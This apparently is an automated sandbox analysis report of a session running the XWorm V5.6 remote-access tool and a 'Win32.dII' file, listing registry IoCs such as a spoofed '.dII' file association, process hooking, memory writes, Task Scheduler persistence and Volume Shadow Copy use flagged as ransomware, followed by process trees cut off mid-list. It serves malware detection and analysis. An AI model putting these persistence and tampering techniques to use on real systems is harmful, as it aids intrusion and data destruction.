Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url1 = 10bb093b4b90db01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url3 = 0000000000000000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c84c6d3b2b5dd148a097aac550ad8cf000000000020000000000106600000001000020000000d75d7ff6c09a3b5fe5bb3dcbae83f3bd2e15db918b4c8469670f85f10c12fdea000000000e800000000200002000000053711fa23bd7bfdd15cd83e021693f4774d1ae7dcba74f76f13526f4a70544f0200000005efbe49d3eeb9cf5ea39b8a009f28bce397318159f2574eb526a3e45b4f8a15b40000000c83ddf0b699a6a3fc7a50efe55c0c7a0353bfffe5a98ed0286cebd1f361754221935a1d479424b64b8f02f4e4f8c11989a67ffe996a95824aa9437fa50b02741	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLs\url3 = "https://login.aliexpress.com/"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLs\url6 = "https://twitter.com/"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url6 = 0000000000000000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\DefaultIcon\ = "c:\\windows\\SYSTEM\\shell32.dll,-154"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII\ = "dIIfile"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII\Content Type = "application/x-msdownload"	SERVER.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII\Content Type = "application/x-msdownload"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\DefaultIcon	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII\Content Type = "application/x-msdownload"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII\ = "dIIfile"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\DefaultIcon	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII\Content Type = "application/x-msdownload"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII\ = "dIIfile"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\DefaultIcon	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII\Content Type = "application/x-msdownload"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\DefaultIcon\ = "c:\\windows\\SYSTEM\\shell32.dll,-154"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII\Content Type = "application/x-msdownload"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\DefaultIcon	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII\Content Type = "application/x-msdownload"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\DefaultIcon	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command	Win32.dII
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	Xworm V5.6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII	Win32.dII
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 = 4c003100000000002359ca2e100041646d696e00380008000400efbe2359ab292359ca2e2a00000030000000000004000000000000000000000000000000410064006d0069006e00000014000000	Xworm V5.6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\DefaultIcon\ = "c:\\windows\\SYSTEM\\shell32.dll,-154"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII\Content Type = "application/x-msdownload"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\DefaultIcon\ = "c:\\windows\\SYSTEM\\shell32.dll,-154"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\Shell\open\command\ = "\"%1\" %*"	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\DefaultIcon\ = "c:\\windows\\SYSTEM\\shell32.dll,-154"	Win32.dII
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dII	Win32.dII
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dIIfile\DefaultIcon\ = "c:\\windows\\SYSTEM\\shell32.dll,-154"	Win32.dII

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1440	7zFM.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
3068	7zFM.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
2684	rundll32.exe
1440	7zFM.exe
2720	Xworm V5.6.exe
3068	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	2224	IEXPLORE.EXE
Token: SeIncBasePriorityPrivilege	2224	IEXPLORE.EXE
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe
Token: SeShutdownPrivilege	1852	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1548	iexplore.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1440	7zFM.exe
1440	7zFM.exe
1440	7zFM.exe
1440	7zFM.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe

Suspicious use of SendNotifyMessage 33 IoCs

pid	Process
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
2720	Xworm V5.6.exe

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
1548	iexplore.exe
1548	iexplore.exe
2224	IEXPLORE.EXE
2224	IEXPLORE.EXE
1548	iexplore.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2684	rundll32.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe
2720	Xworm V5.6.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1548 wrote to memory of 2224	1548	iexplore.exe	31
PID 1548 wrote to memory of 2224	1548	iexplore.exe	31
PID 1548 wrote to memory of 2224	1548	iexplore.exe	31
PID 1548 wrote to memory of 2224	1548	iexplore.exe	31
PID 1852 wrote to memory of 2136	1852	chrome.exe	34
PID 1852 wrote to memory of 2136	1852	chrome.exe	34
PID 1852 wrote to memory of 2136	1852	chrome.exe	34
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 900	1852	chrome.exe	36
PID 1852 wrote to memory of 2624	1852	chrome.exe	37
PID 1852 wrote to memory of 2624	1852	chrome.exe	37
PID 1852 wrote to memory of 2624	1852	chrome.exe	37
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38
PID 1852 wrote to memory of 1612	1852	chrome.exe	38

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\sample.html
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1548
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1548 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6599758,0x7fef6599768,0x7fef6599778
  2⤵
  PID:2136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1168 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:2
  2⤵
  PID:900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  - Downloads MZ/PE file
  PID:2624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1536 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:1612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2240 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2252 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:2580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3172 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:2
  2⤵
  PID:1676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1368 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:2356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3380 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:2340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3496 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:2216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3612 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:1092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3384 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:2000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3680 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:1728
- C:\Program Files\Google\Chrome\Application\chrome.exe
